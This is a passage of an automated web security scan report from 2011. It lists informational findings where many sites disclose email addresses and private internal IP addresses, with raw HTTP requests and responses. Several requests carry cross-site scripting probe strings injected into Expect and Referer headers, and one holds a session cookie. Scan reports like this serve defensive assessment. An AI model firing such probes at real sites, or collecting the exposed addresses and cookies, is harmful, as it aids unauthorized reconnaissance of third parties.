Server: Apache/2.2.3 (CentOS) DAV/2 mod_fastcgi/2.4.6 PHP/5.1.6
Content-Length: 550
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@wordplays.com">
...[SNIP]...

23.76. http://www.wylienews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wylienews.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

cengbrock@wylienews.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wylienews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 1))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 1))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 1))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "cengbrock@wylienews.com" on "2009.12.14T16:23-0500" exp "2010.12.14T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:15 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

23.77. http://www.yardbarker.com/javascripts/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yardbarker.com
Path:	/javascripts/all.js

Issue detail

The following email addresses were disclosed in the response:

sammi@oriontransfer.co.nz
tdd@tddsworld.com

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Tue, 03 May 2011 17:08:26 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 03 Feb 2011 23:10:06 GMT
Connection: keep-alive
Keep-Alive: timeout=2
Content-Length: 278620

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
;

Element.addMethods(Effect.Methods);

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

24. Private IP addresses disclosed previous next
There are 41 instances of this issue:

http://connect.facebook.net/en_US/all.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/UpS8_ZmY8j-.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/kSPKJpX3bda.js
http://www.610wtvn.com/favicon.ico
http://www.6url.com/favicon.ico
http://www.ajdesigner.com/favicon.ico
http://www.algaecal.com/favicon.ico
http://www.aliciasrecipes.com/favicon.ico
http://www.am570radio.com/favicon.ico
http://www.babygenderprediction.com/favicon.ico
http://www.beautifulcervix.com/favicon.ico
http://www.bookreporter.com/favicon.ico
http://www.bordersheriffs.com/favicon.ico
http://www.danielsilvabooks.com/favicon.ico
http://www.dickeys.com/favicon.ico
http://www.einsurancemarket.com/favicon.ico
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.festfoods.com/favicon.ico
http://www.getgrantinfo.net/favicon.ico
http://www.greatnow.com/favicon.ico
http://www.gtlakes.com/favicon.ico
http://www.jcpamericanlivingtour.com/favicon.ico
http://www.justgiving.com/favicon.ico
http://www.lacounty.info/favicon.ico
http://www.letusreason.org/favicon.ico
http://www.medcitynews.com/favicon.ico
http://www.menstuff.org/favicon.ico
http://www.nextgenwalkthroughs.com/favicon.ico
http://www.nextmark.com/favicon.ico
http://www.ocfl.net/favicon.ico
http://www.sew4home.com/favicon.ico
http://www.sugardoodle.info/favicon.ico
http://www.themat.com/favicon.ico
http://www.visitsouth.com/favicon.ico
http://www.wdasfm.com/favicon.ico

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

24.1. http://connect.facebook.net/en_US/all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connect.facebook.net
Path:	/en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.220.107

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "7d20ea318a359d0a11d98e797505f73f"
X-FB-Server: 10.32.220.107
X-Cnection: close
Cache-Control: public, max-age=781
Expires: Tue, 03 May 2011 15:54:40 GMT
Date: Tue, 03 May 2011 15:41:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115140

/*1304328880,169925739,JIT Construction: v372758,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

24.2. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yC/r/vSJ96PL2YpP.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.184

Request

GET /rsrc.php/v1/yC/r/vSJ96PL2YpP.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 27 Apr 2011 22:39:47 GMT
X-FB-Server: 10.138.17.184
Vary: Accept-Encoding
Cache-Control: public, max-age=31091791
Expires: Fri, 27 Apr 2012 12:19:14 GMT
Date: Tue, 03 May 2011 15:42:43 GMT
Connection: close
Content-Length: 26405

/*1303993212,176820664*/

body.fan_widget{background:transparent}
.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:w
...[SNIP]...

24.3. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/UpS8_ZmY8j-.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yD/r/UpS8_ZmY8j-.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yD/r/UpS8_ZmY8j-.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 25 Apr 2011 17:10:31 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30859515
Expires: Tue, 24 Apr 2012 20:11:57 GMT
Date: Tue, 03 May 2011 16:06:42 GMT
Connection: close
Content-Length: 103418

/*1303762346,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["LNwoY"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

24.4. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yH/r/eIpbnVKI9lR.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/yH/r/eIpbnVKI9lR.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

Response

HTTP/1.1 200 OK
Content-Length: 153
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 21:12:48 -0800
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Cache-Control: public, max-age=27091789
Expires: Mon, 12 Mar 2012 05:12:32 GMT
Date: Tue, 03 May 2011 15:42:43 GMT
Connection: close

.PNG
.
...IHDR..............f0.....PLTE;Y....m.....Eb.;Y.`x...._....tRNS........2IDAT.[c`....P........J.......qcAc..`.IIIIPI.NC....D...lb.....IEND.B`.

24.5. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yN/r/WU1xUSaLgfA.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.185

Request

GET /rsrc.php/v1/yN/r/WU1xUSaLgfA.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 25 Apr 2011 17:27:42 GMT
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Cache-Control: public, max-age=30860998
Expires: Tue, 24 Apr 2012 20:12:41 GMT
Date: Tue, 03 May 2011 15:42:43 GMT
Connection: close
Content-Length: 33117

/*1303762251,176820665*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

24.6. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/kSPKJpX3bda.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ye/r/kSPKJpX3bda.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/ye/r/kSPKJpX3bda.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 25 Apr 2011 17:25:38 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30861585
Expires: Tue, 24 Apr 2012 20:46:27 GMT
Date: Tue, 03 May 2011 16:06:42 GMT
Connection: close
Content-Length: 60825

/*1303764551,169775815*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dO6dA"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

24.7. http://www.610wtvn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.9.10.93

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.8. http://www.6url.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6url.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.80

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6url.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "10fe40becc71cb1:0"
Last-Modified: Fri, 22 Oct 2010 09:37:28 GMT
X-Powered-By: ASP.NET
Content-Length: 894
Date: Tue, 03 May 2011 11:35:38 GMT
X-Varnish: 648441166 648391710
Age: 116
Connection: keep-alive
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

..............h.......(....... ...........@...............................A?@A?@.............................................A?@A?@A?@..........................................A?@=..A?@A?@............
...[SNIP]...

24.9. http://www.ajdesigner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ajdesigner.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.11.23

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ajdesigner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: max-age=29030400, public, must-revalidate
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 12 Feb 2009 07:23:46 GMT
Content-Length: 1406
Date: Tue, 03 May 2011 11:40:55 GMT
X-Varnish: 803494362 803309716
Age: 6444
Connection: keep-alive
Via: 1.1 varnish 172.16.11.23
X-Cache: HIT

..............h.......(....... ...........@.............................................z...........................................y..............u...................j...r...u.......................
...[SNIP]...

24.10. http://www.algaecal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.algaecal.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.171

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.algaecal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Tue, 03 May 2011 11:03:55 GMT
X-Varnish: 1791290154
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.171
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...

24.11. http://www.aliciasrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aliciasrecipes.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.104

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aliciasrecipes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1490344417
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:19:46 GMT
Via: 1.1 varnish 172.17.34.104
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.12. http://www.am570radio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.9.10.94

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.13. http://www.babygenderprediction.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.babygenderprediction.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.66.87

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babygenderprediction.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1458347236
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:52:24 GMT
Via: 1.1 varnish 172.17.66.87
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.14. http://www.beautifulcervix.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautifulcervix.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.103

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beautifulcervix.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2242232614
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 10:53:01 GMT
Via: 1.1 varnish 172.17.34.103
Connection: Keep-Alive
Age: 0
Content-Length: 485

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

24.15. http://www.bookreporter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bookreporter.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.80

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookreporter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "e211fac76d5fcb1:0"
Last-Modified: Wed, 29 Sep 2010 00:32:22 GMT
X-Powered-By: ASP.NET
Content-Length: 586
Date: Tue, 03 May 2011 10:19:27 GMT
X-Varnish: 646725532 646655772
Age: 208
Connection: keep-alive
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

GIF89a..........ff3...k
...i
....j
.........l..E4...z* x%.^........x>6o.....3Yr~4(....ZD.S?.hP...`b5.+........`I.jM.S>.[D]..p..d.....~M@....jOf...Fo.4gv..x(.f.. 4bl..=.b...:,.uXi. x)..YD.hNi. ....
...[SNIP]...

24.16. http://www.bordersheriffs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bordersheriffs.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.66.125

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bordersheriffs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/vnd.microsoft.icon
Content-Length: 0
Date: Tue, 03 May 2011 11:16:50 GMT
X-Varnish: 782668518
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.66.125
X-Cache: MISS

24.17. http://www.danielsilvabooks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.danielsilvabooks.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.80

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.danielsilvabooks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.0
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 1245
Date: Tue, 03 May 2011 11:05:56 GMT
X-Varnish: 647741884
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.34.80
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

24.18. http://www.dickeys.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dickeys.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.17.34.80

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dickeys.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "47764682db8cb1:0"
Last-Modified: Wed, 19 Jan 2011 23:05:47 GMT
X-Powered-By: ASP.NET
Content-Length: 1150
Date: Tue, 03 May 2011 11:42:51 GMT
X-Varnish: 648628578 648616346
Age: 31
Connection: keep-alive
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

............ .h.......(....... ..... .........................,F`.&:N.....2-0.3$&.@.0.+%,.*"(.0)/..',.-(-.0...>22..(4.$:M.)@V.nno.GEF..]z......Zp..^i......................l....&.-...W[\.joq.....h_^...
...[SNIP]...

24.19. http://www.einsurancemarket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.einsurancemarket.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.16.135

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.einsurancemarket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

24.20. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.44.63

Request

Response

24.21. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.49.127

Request

GET /extern/login_status.php?api_key=131596456859393&app_id=131596456859393&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18a33f391130cc%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Fffe58ade6f1492%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15d93aa23bd6dc%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Fffe58ade6f1492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b54d9977f5024%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3af7007a98cc9%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Fffe58ade6f1492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b54d9977f5024&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df96f78d5cdca78%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Fffe58ade6f1492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b54d9977f5024&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2de86d1c661e28%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Fffe58ade6f1492%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b54d9977f5024&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

